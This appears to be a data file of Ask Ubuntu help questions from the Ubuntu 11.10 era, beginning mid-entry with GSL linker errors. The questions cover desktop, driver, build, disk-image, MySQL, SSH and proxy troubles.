/usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_ctrsm' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_drotmg' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_dsyrk' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_dznrm2' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_ssyr2k' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_chemv' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_dsyr2' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_srotm' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_dscal' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_cdotu_sub' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_zswap' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_dswap' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_zcopy' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_ztrmv' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_scopy' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_drot' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_ssyrk' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_zsyr2k' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_zaxpy' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_zher' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_daxpy' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_cscal' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_srotmg' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_ssyr' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_strsm' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_dsymv' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_zgeru' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_dcopy' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_snrm2' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_dtrmm' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_strsv' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_zdotc_sub' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_strmm' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_csymm' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_sger' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_zscal' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_srotg' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_strmv' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_cgerc' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_saxpy' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_cherk' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_dsdot' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_ssymv' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_zher2' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_ddot' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_dnrm2' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_cgemv' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_zgemv' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_ctrmv' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_cswap' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_zgemm' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_ctrmm' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_csyrk' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_dsyr2k' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_dsyr' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_sgemm' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_srot' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_dzasum' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_idamax' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_csyr2k' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_zhemv' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_drotm' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_dsymm' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_zsyrk' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_sdsdot' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_zgerc' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_ssyr2' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_cher' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_zsymm' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_ztrsm' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_cher2k' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_sasum' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_ztrsv' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_ccopy' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_ztrmm' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_dger' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_dtrmv' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_izamax' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_zdscal' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_sdot' /usr/lib/gcc/i686-linux-gnu/4.6.1/../../../../lib/libgsl.so : undefined reference to `cblas_zdotu_sub' collect2 : ld returned 1 exit status i get the same slew of undefined references if i do this , whether on natty or oneiric : $ g++ gsl-test.cpp -lgsl not sure what to make of that yet .
69317	need to disable show password in wireless	i work for a school and we are setting up some ubuntu laptops for student use . the wireless password needs to be secure so students ca n't connect their personal devices onto the network . the problem we are facing right now is that the network manager lets you view the saved wireless passwords in plain text . i changed the permissions of the network config editor so students can connect to any other networks or even pull up the editor to view the password . so that fixed the problem.. so i thought.. i just realized that if the laptop can not connect to the network then it pops up an authentication needed error box and with the show password check box available again.. so students can figure out the wireless password . does anyone know where i can turn off that checkbox option ? would it be under gconf-editor to a specific file ? right now i have no work around so the laptops are sitting in my office and wo n't be able to be used until i have a solution . current config - ubuntu 10.04 currently have /home/username/.gconf/apps/nm-applet set to chmod 000 along with /usr/bin/nm-connection-editor set to 000 also . this is how i blocked access the password but when that box auto pops up because it ca n't connect and gives them the password on a silver platter its kind of hard to allow the students to use them.. btw i am not the network admin so i ca n't just change that it only accepts wireless by mac address.. we have over 5000 machines on the network and roughly half have wireless so they are n't going to switch over any time soon .
69324	where to configure shortcut keys of nautilus ?	i would like to configure and change some shortcut keys of nautilus ( file manager of ubuntu ) . does anyone know where i could do that ? edit1 : precisely , initial binding for `` go to parent folder '' in nautilus is tab + up arrow , i would like to chang it to ctrl + up arrow because tab + up arrow has already been set to other things via compiz .
69327	why does the file lens not search mounted samba shares ?	i 've got several samba shares mounted in my home directory ( mounted with the `` mount.cifs '' command ) . i can browse the shares just fine . from nautilus i can search them just fine . my question is why does n't the dash file lens search the mounts as well ? i 've also noticed files i open from the shares do not show up as recently used ( again in the file lens ) . i 've googled around and i 've been unable to come up with any thing .
69330	how can i get unity-2d-launcher to integrate with awesome wm ?	i really like the unity launcher , but in awesome it only displays on tag 1 , and sometimes pops up behind other windows . has anyone figured out a way to get this to work ?
69331	emacs unity global app menu integration stopped working in 11.10	emacs ' unity global app menu integration stopped working when i upgraded to 11.10 . anyone know how to get it working ?
69335	how to enable empathy chat room notifications ?	is it possible in empathy ( ubuntu 11.10 , gnome-shell ) to receive notifications when somebody posts a message to a chat room ? i have checked the `` enable bubble notifications '' box under edit > preferences . i currently receive notifications for direct messages from my colleagues , but not when somebody posts to the chat room .
69342	empathy messages do n't show up in message indicator	since upgrading to 11.10 , sometimes empathy messages do n't show up in the message indicator applet . is this a known regression or a `` feature ? '' i think the problem occurs when the chat window is already open , the indicator applet is n't notified ( does n't turn blue or have an event in the queue ) . was n't this something fixed in the 10.10 - > 11.04 update ?
69345	ubuntu one : problem syncing across multiple desktops	i have multiple desktops ( windows ( 7 and vista ) and ubuntu 11.04 ) . on my ubuntu box i moved approximately 1.7gb files from current projects ( jpg , .ods etc ) . from the web interface i can see that the files were uploaded to the cloud . on one of my ubuntu boxes i see the folders . however the other machines can see the folders but not the root folder but no sub-folders or files ? any suggestions . is there a method by which i could re-initiate a full sync . or on a particular machine ( windows and ubuntu ) thanks
69346	ubuntu login sound missing in gnome shell	when i start gnome shell , the login sound of ubuntu does n't play . i 've tried to find the startup command of the sound on google without any luck . does anyone know how to fix this ?
69347	how to workaround or diagnose a kernel panic when `` safely removing '' external hdd ?	i 'm experiencing an issue when using the `` safely remove '' option to remove my 1tb external hdd from the unity launcher . not every time , but occasionally my screen will go black and display large amounts of text information ( which i obviously can not screen cap ) . the jist of the info displayed is that unmounting or 'safely removing ' the drive causes a kernel panic . is there a command line command to remove mounted drives , or at least one that would show me some sort of error output when the drive is removed ? i 'm trying to narrow down the cause . i could be imagining this , but it seems to happen most often when i have other programs running when i remove the drive ( i.e . firefox , transmission ) . please note that my external drive is not in use when i attempt to remove it and it is not being used either by firefox or transmission at these times . any help would be appreciated .
69348	why should n't you enable laptop-mode when on ac power ?	i 'm looking at ways to reduce the amount of power used by my laptop , and one of the things i came across was enabling laptop-mode . apparently this is enabled when i 'm not on ac power , but i 'd like to save power when running on ac as well . is there a reason why this is n't default ?
69349	how to change gnome shell calendar default application ?	in gnome shell calendar menu , when i click on `` open calendar '' it tries to open evolution - even if it 's not installed - is it possible to change the default calendar ? p.s . gnome shell calendar does not follow default calendar application
69351	how to add lenses to the launcher ?	can someone tell me how to add the more apps and find files button to the ubuntu 11.10 launch bar ? they were both in the dash home and the launch bar in version 11.04 . now it 's not in the 11.10 by default . if they were in the launcher they would be easier to use . it 'd also save clicks and mouse movement . thanks in advance for any suggestions or comments .
69354	there 's no sound mixer menu , missing menu option in sound recorder	i am using : -ubuntu 11.10 -skype -ps3 eye toy camera to input video and sound this setup has been properly working in former ubuntu releases . to use the mic already built in on the ps3 eye toy camera i open de sound recorder app ( notice : not inside skype , from inside skype it is not possible to do this ) that is included in gnome and then i go to file > sound mixer , from this menu i can choose gnome to get the input audio from the ps3 eye toy , instead of from the audio-in of the computer . now in ubuntu 11.10 this sound mixer menu inside sound recorder is missing , gnome says something like this : gnome-volume-control is not installed in the proper directory note : i have tried this on unity , unity 2d , gnome classic , gnome classic 2d and gnome shell . in all of them the problem is the same . what can i do ? basically what i want to do is to be able to tell the computer to get the audio in from the ps3 camera . thanks in advance .
69355	how do i prevent a hp pavilion dv6700 from overheating ?	well this version makes my system so hot that i can use it anymore . a friend i introduced this version to wants me to completely remove ubuntu . specs : hp pavilion dv6700 windows 7/11.10 64bit intel core 2 duo 2.0ghz intel965gm graphic card 232gb hdd 4gb ram
69356	upgraded to ubuntu 11.10 ... not booting up ... want to copy some date from home folder ?	i have dell inspiron m101z which i was running with ubuntu 11.04 . tomorrow i upgraded it to ubuntu 11.10 , unfortunately its not booting up lightdm display manager is not loading and boot halts after `` checking battery status ... '' i left some my important data in my home folder which i want to copy to my external but as system is not booting up so i login to diff tty and attach my extrnal drive but the drive is not being shown under media folder so i am unable to copy it ... is there any method to recover data in my case ! ! ! aftr that i want to do a clean install
69357	6770 amd drivers ... nothing but trouble ?	i downloaded 11.10 a couple days ago -- so far i love it , but i 'm having issues with a graphics driver for the 6770 hd radeon card . firstly , if i try the two drivers from the driver program , one of them installs fine and one of them does n't ( the post-release one does n't work at all , it fails during the dl and install ) . the one that does work decreases my performance -- just moving around windows causes minor lag . so after some searching , i discovered this thread : how to install ati radeon 6770 drivers on 10.04 ? , and i followed the directions on it . drivers install all fine and dandy ( and i did de-activate the other driver before installing ) , but after a reboot ( which the driver install requested ) , my desktop is all screwy . no launchpad , nothing but a desktop and a stripped-down top bar with what i think is the file/edit/view menu from ubuntu 's explorer program ( do n't know the name ) . i 'd post screenshots for you , but i could neither access a program to do so , nor open firefox to upload them when it happens . also , both drivers , the one straight from amd , and the one from the driver program caused issues with my dual monitors . i had no luck using catalyst to change any settings either .
69362	how can i see net traffic in the apps bar ?	i have a question . how can i see net traffic in the apps bar ? do i have to install something ? i do n't want to analyze the traffic , just see if its having incoming/outgoin data transfer . thxs !
69363	mount single partition from image of entire disk ( device )	i made an image of my entire disk with dd if=/dev/sda of=/media/external_media/sda.img now the problem is i 'd like to mount an ext4 filesystem that was on that disk but mount -t ext4 -o loop /media/external_media/sda.img /media/sda_image obviously gives a superblock error since the image contains the whole disk ( mbr , other partitions ) not just the partition i need . so i guess i should find a way to make the disk image show up in the /dev/ folder ... does anyone know how to do that ? ps : i can always dd back the image to the original disk , but that would be very inconvenient ( i updated the os and i 'd like to keep it as it is )
69365	ca n't build gcc anymore since upgrade to 11.10	on monday i 've upgraded to from ubuntu 11.04 ( my initial installation ) to 11.10 and now i ca n't build gcc from source anymore . since i forgot to uninstall the gcc package before the upgrade , ubuntu replaced my 4.7.0 compiler with it 's stable 4.6.1 . so i tried to build the svn sources again , but it fails . i 've most recently tried it with svn revision 180193 . after some time , the build fails with the following message : /home/raphael/devel/gcc/build/./gcc/xgcc -b/home/raphael/devel/gcc/build/./gcc/ -b/usr/i686-pc-linux-gnu/bin/ -b/usr/i686-pc-linux-gnu/lib/ -isystem /usr/i686-pc-linux-gnu/include -isystem /usr/i686-pc-linux-gnu/sys-include -g -o2 -o2 -i . -i . -i../../src/gcc -i../../src/gcc/ . -i../../src/gcc/../include -i../../src/gcc/../libdecnumber -i../../src/gcc/../libdecnumber/bid -i../libdecnumber -i../../src/gcc/../libgcc -g -o2 -din_gcc -w -wall -wwrite-strings -wcast-qual -wstrict-prototypes -wmissing-prototypes -wold-style-definition -isystem ./include -fpic -g -dhave_gthr_default -din_libgcc2 -fbuilding-libgcc -fno-stack-protector -i . -i . -i../.././gcc -i../../../src/libgcc -i../../../src/libgcc/ . -i../../../src/libgcc/../gcc -i../../../src/libgcc/../include -i../../../src/libgcc/config/libbid -denable_decimal_bid_format -dhave_cc_tls -duse_tls -o _ashldi3.o -mt _ashldi3.o -md -mp -mf _ashldi3.dep -dl_ashldi3 -c ../../../src/libgcc/../gcc/libgcc2.c \ -fvisibility=hidden -dhide_exports in file included from /usr/include/stdio.h:28:0 , from ../../../src/libgcc/../gcc/tsystem.h:88 , from ../../../src/libgcc/../gcc/libgcc2.c:29 : /usr/include/features.h:323:26 : fatal error : bits/predefs.h : file or directory not found . i 've cofigured it with : ~/devel/gcc/build $ ../src/configure -- prefix=/usr -- enable-languages=c++ and make it with : ~/devel/gcc/build $ make -j4 just to be sure , i did a rm -rf * in the build directory in case there 's some broken stuff inside . did n't help , though . that 's the backstory . i tried to fix it and searched for the bits/predefs.h . it 's inside /usr/include/i386-linux-gnu . i temporarily fixed the problem by doing ~/devel/gcc/build $ c_include_path=/usr/include/i386-linux-gnu make -j4 which is only temporary because now gcc complains that it ca n't find crti.o . which i can find in /usr/lib/i386-linux-gnu . now i could also set c_library_path - actually it does n't work - but i feel like i 'm fighting the system here . also , even if it succeeds , my newly built compiler would also not know about the i386-linux-gnu stuff . so i would have to set c_library_path and c_include_path before every build of every project i have . i could add it to my .bashrc but that subverts the system even more . so , how do i tell the build process : that there are additional include/lib directories , and that it should build a gcc which respects them too ? edit : i forgot to include the command which causes the above error message . also i can think of another solution : copy the stuff from /usr/include/i386-linux-gnu to /usr/include ( same thing for /usr/lib/i386-linux-gnu to /usr/lib ) . but that does n't feel right , either . finally , the system 's gcc 4.6.1 can compile other applications just fine , except mine , which use c++11 features not present in the 4.6 series .
69375	has anyone compiled espeak text-to-speech ?	i have used ubuntu as the os for about 1.5 years on our desktop . i am also dyslexic so the espeak text reader is a huge help ! i put the 11.10 ubuntu on our amd 64 laptop . espeak does n't work on 11.10 . ms windows has great freeware to do this , try `` readplease 2003 '' however readplease 2003 is for window only and will not run in wine . if someone has does so or could explain to be how to compile the source for espeak so that it could run on 11.10 ubuntu i 'd be grateful ? ?
69377	i ca n't add a indicator applet to panel in gnome-classic	ubuntu 11.10 i recently changed unity for classic desktop . so , i noticed that the volume control dissappeared . so i read everywhere that the only thing to do is add the inidicator applet in the panel . but i dont have that option in my applet list .
69379	how do i make the window border bigger ?	i 'm using ubuntu 11.10 in a virtualbox vm on a macbook pro with the default unity ui . positioning the mouse cursor over the 1-pixel wide border to resize a window is driving me absolutely nuts . lots of people have asked the same question but all the advice i 've found for fixing this does n't seem to work : in system settings > appearance , there are four themes ( ambiance , radiance , highcontrast , highcontrastinverse ) , all of which have exactly the same size resize border . installing other packages ( e.g . human-theme ) has no effect on the theme selection . my laptop does n't have a middle mouse button , and even if it did , i do n't want to use two hands to press alt + middle button just to resize a window . in an attempt to change the resize key binding , i installed compizconfig-settings-manager and ran ccsm . any changes i make to the initiate window resize binding in the resize window plugin have no effect . in fact ccsm seems to do nothing at all . i discovered that the previous issue is because i 'm using unity 2d instead of unity ( 3d ) , even though i 'm picking the non-2d desktop when i log in . unity 2d has no equivalent of ccsm as far as i can see . and when i configure virtualbox so that the 3d unity starts up , i get completely screwed up window behavior ( missing all borders , do n't accept mouse clicks , etc. ) . sigh . so : help please ! i hate to use the m word , but on the mac all windows also have a 1-pixel visual border , but the invisible resize border is actually usable ( it 's at least 8 pixels wide on the edges , plus a nice big rectangle in the lower-right corner ) . i do n't think implementing usable resize behavior should be up to each individual theme ; this is a lower-level functionality issue and should work right in every theme . what 's the right package to file a bug against for this ?
69380	my mysql installation is broken . how to completely reconfigure it ?	here are the following commands i have done . $ sudo service mysql start mysql start/running $ mysql -u root error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) $ aptitude search mysql |grep ^i i libapache2-mod-auth-mysql - module apache 2 pour l'authentification vi i libdbd-mysql-perl - perl5 database interface to the mysql data i libmysqlclient16 - mysql database client library i mysql-client-5.1 - mysql database client binaries i mysql-client-core-5.1 - mysql database core client binaries i mysql-common - mysql database common files , e.g . /etc/mys i mysql-server-5.1 - mysql database server binaries and system i mysql-server-core-5.1 - mysql database server binaries i php5-mysql - mysql module for php5
69388	cpu usage under ideal condition	i 'm using dell xpx l502x ( i7 - core ) with ubuntu 11.10 with nvidia 525 with optimus support . i have installed ironhide for optimus support on my laptop . when i look at system monitor even under ideal condition 2 - 3 cores out of 8 cores shows around 10 % usage . is this issue normal . how to resolve it if it is an issue . please guide me
69392	how to change xorg.conf file with permission ?	i want to edit the /etc/x11/xorg.conf file but i ca n't save the file . it says `` permission denied . '' how can i edit the file ?
69394	after recent update my netbook launcher in ubuntu 10.04 has vanished	after a recent system update my netbook launcher is not working and has vanished . i am able to see the title bar like system clock and other apps but not able to access any apps . i tried booting to the 2d edition and it works fine.. can you help..
69395	why does n't ubuntu read my disk partition ?	the answers to similar questions have not been useful to me . i installed ubuntu 11.10 with wubi on window 7 . my hd has two main partitions : c and d. ubuntu is installed in c , where all my media files are and only reads the d partition . the c files are not in media directory as was suggested in an answer to a similar question . everything else works fine , so far . antonio @ ubuntu : ~ $ sudo fdisk -l [ sudo ] password for antonio : disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x8da2c67c device boot start end blocks id system /dev/sda1 * 2048 209717247 104857600 7 hpfs/ntfs/exfat /dev/sda2 209717248 467388415 128835584 7 hpfs/ntfs/exfat /dev/sda3 467388416 488359935 10485760 1b hidden w95 fat32 /dev/sda4 488359936 488392064 16064+ ef efi ( fat-12/16/32 ) antonio @ ubuntu : ~ $ sudo parted -l model : ata st9250315as ( scsi ) disk /dev/sda : 250gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 107gb 107gb primary ntfs boot 2 107gb 239gb 132gb primary ntfs 3 239gb 250gb 10.7gb primary fat32 hidden 4 250gb 250gb 16.5mb primary
69398	al cambiar de escritorio se cierran las ventanas o no se mueven del suyo	mi problema esta en que cuando muevo una ventana a otro escritorio , esta permanece en el que estaba y soy yo quien cambia de escritorio , cuando la intento mover haciendo clic con el bot贸n derecho en la parte superior de ella y le doy a mover a otra 谩rea de trabajo ( escritorio ) se cierra la ventana . otra pregunta es en que parte hay que configurar unity para que si yo cambio de escritorio y pulso sobre una aplicaci贸n esta se abre completamente nueva , es que cuando le doy lo que hace es que me lleva al escritorio donde dicha aplicaci贸n esta abierta . muchas gracias y saludos . pd : uso ubuntu 11.10 y tengo activado compiz .
69404	what will happen if i install wayland ?	i am curious about the progress being made with wayland and would like to perhaps give it a spin . according to the launchpad page , it is packaged in oneiric ( and has actually been packaged since natty ) . therefore i can simply install it by running : sudo apt-get install wayland-demos however , i do n't know what will happen if i install it . will i need to manually launch it ? will it play nice with x configuration files and settings ? will anything break ?
69407	how to create and access extra space on usb stick ?	i used the ubuntu 11.10 iso and did a dd to create a liveusb . i also used gparted to assign the extra space to a second vfat partition . is there any way to mount the additional space while running from the liveusb image on the same device ? when i try i get an error that the device is busy ? my steps were the same as those documented at this site : http : //www.tuxgarage.com/2011/06/ubuntu-switched-to-hybrid-disc-images.html . i also noticed that when i insert this usb into a windows machine i 'm unable to access the vfat section of usb . is there anyway to mount sdb2 under windows ?
69411	ca n't install ndiswrapper commons from the cd	i need to install my wireless driver through ndisgtk that comes in the ubuntu cd , i need to install ndiswrapper-common and ndiswrapper-utils first , but when i try to install ndiswrapper-common the install button is disabled , i do n't have an internet connection since i do n't have wireless , is there another way to install those three packages that i need ? ubuntu 11.10
69414	boot menu kernel header update	i recently updated my ubuntu from 11.04 to 11.10 today , in this i know that it is with kernel 3.0 now after installation when i rebooted my system.i had the same old kernel 2.6.38.8 ... so i dig in to it and found out that my boot menu was not getting updated ! ! then i saw my /boot dir and found that i had 2.6.38.11 and 3.0.0.0-12 all versions but my grub2 is not updating boot menu ! ! what to do ? i tried boot-repair , grub customizer and also reinstalled grub2 but i m still unable to fix this issue ! ! so can u suggest any solution and yes i m not very command line friendly : ) hint : - i tried command sudo update-grub and sudo grub-mkconfig -o /boot/grub/grub.cfg but both say `` syntax error '' doubt : - i experimented burge boot-loader 7 to 8 months back ! ! was working well but it broke my plymouth so i removed it.but i think since then my kernel header is not being updated ! ! so could it be the coz of my problem ? : ) sorry4such long post , but i thought this details might help u find some solutions thanks bye.. : (
69415	3d stopped working 11.10 , intel drivers	now i ca n't get to the lightdm screen . i had this problem , and i tried to fix this according to this answer . before i did this move , i was able actually to log in to unity 2d and gnome shell . how do i undo the commands i followed , that got things worse . and how i can get 3d again ? note : several days ago , i had an update of xorg that failed .
69416	window-manager buttons no longer highlight on mouseover if window is n't maximized	since the upgrade to 11.10 , the window buttons ( close , minimize , maximize ) only highlight on mouseover when the window is maximized , as shown in the images below : not maximized - no highlighting : maximized - highlighting : does anyone know how to solve this issue ?
69419	ip access field missing in remote desktop	in oneiric the access ip is missing in remote desktop configuration . i get my ip at whatsmyip.com but still ca n't login . any ideas if the remote desktop preferences ip showed in early versions is the same than my external ( accesible ) ip ? why i ca n't see it anymore ? i tried fedora 15 , and still missing that ip address like in earlier versions ( i guess is something related with gnome 3 ) . am i the only one who have this problem ?
69420	lenovo x220 reboots instead of shutting down	when i push the shutdown button in the shutdown dialog my notebook ( lenovo x220 ) does a restart instead . i also tried running the `` sudo shutdown -p now '' from command line - > same result ! before upgrading to 11.10 everything was fine . anybody else experiences this malfunction ? any tips to make it work again ?
69424	how to create portable applications ?	in ubuntu can you create a portable application and have it work on an os like suse 10.x via usb stick ? i 'm not sure if this can be done or not , how to do it or if it would be compatible ; any advice is greatly welcomed . i need to make a portable version of stellarium and have it work in suse 10.x . i have n't been able to make portable linux versions . i 'm pretty sure there can be portable versions of applications since you can run a program like tor on it .
69432	livecd with nvidia binary drivers	i 'd like to modify the livecd to boot with the nvidia binary drivers . any ideas of how that might be done ? i 've tried several approaches , even a manual installation of the nvidia installer in a chrooted filesystem , but no success so far .
69433	ssh no longer allows public key authentication	my machine recently stopped accepting incoming public key authentication . i have an ubuntu 11.04 desktop that i ssh into from a windows machine . i use putty with pageant . i am able to connect but only with interactive password authentication , not with my rsa key that i have setup . i have already verified that the key is listed in ~/.ssh/authorized_keys . how do i fix this and what do i check ?
69434	ca n't complete dropbox installation from behind proxy	problem : my pc on campus sits behind a proxy ( requiring authentication ) and i ca n't setup dropbox . i am convinced that this is a proxy issue as i ca n't setup ubuntu one either ( but i do n't use ubuntu one so that is not a problem ) . i have looked at the ubuntu one fix but it seems to be to modify settings explicitly related to ubuntu one . i can install the nautilus-dropbox package ( compiled from source and from .deb package from website and from software centre ) but once i click ok from the `` dropbox installation '' dialog box ( prompting me to download the proprietary daemon ) the installation just freezes with the ok button pressed . when i look at its process in system monitor its waiting channel is inet_wait_for_connect . i have set the following proxy directives thus far : added mj22 : ** @ proxy.waikato.ac.nz:80 information to network proxy settings under network in settings . added http_host and http_port variables under gconf-editor- > system- > proxy added 'host ' , 'authentication_password ' 'authentication_user ' and ticked 'user authentication ' and 'use_http_proxy ' under gconf-editor- > system- > http_proxy added export http_proxy= '' http : //mj22 : ** @ proxy.waikato.ac.nz:80/ '' to /etc/bash.bashrc added acquire : :http : :proxy `` http : //mj22 : ** @ proxy.waikato.ac.nz:80/ '' ; to /etc/apt/apt.conf ( which is what i imagine is letting software center retrieve packages ) . ( where ** is my password ) i have also added the equivalent ftp and https lines for the above entries . i get the internet fine and software centre can download packages but thats it . related issues : the software centre ca n't fetch reviews ( but can download packages ) . when trying to add an online account in gnome 3 a dialog pop up appears with `` error getting a request token : can not connect to proxy ( proxy.waikato.ac.nz ) '' updates : after some time ( 10mins ish ) dropbox shows an error dialog box that reads : trouble connecting to dropbox servers . maybe your internet connection is down , or you need to set you http_proxy environment variable . is there a way i can see what environment variables are currently set ?
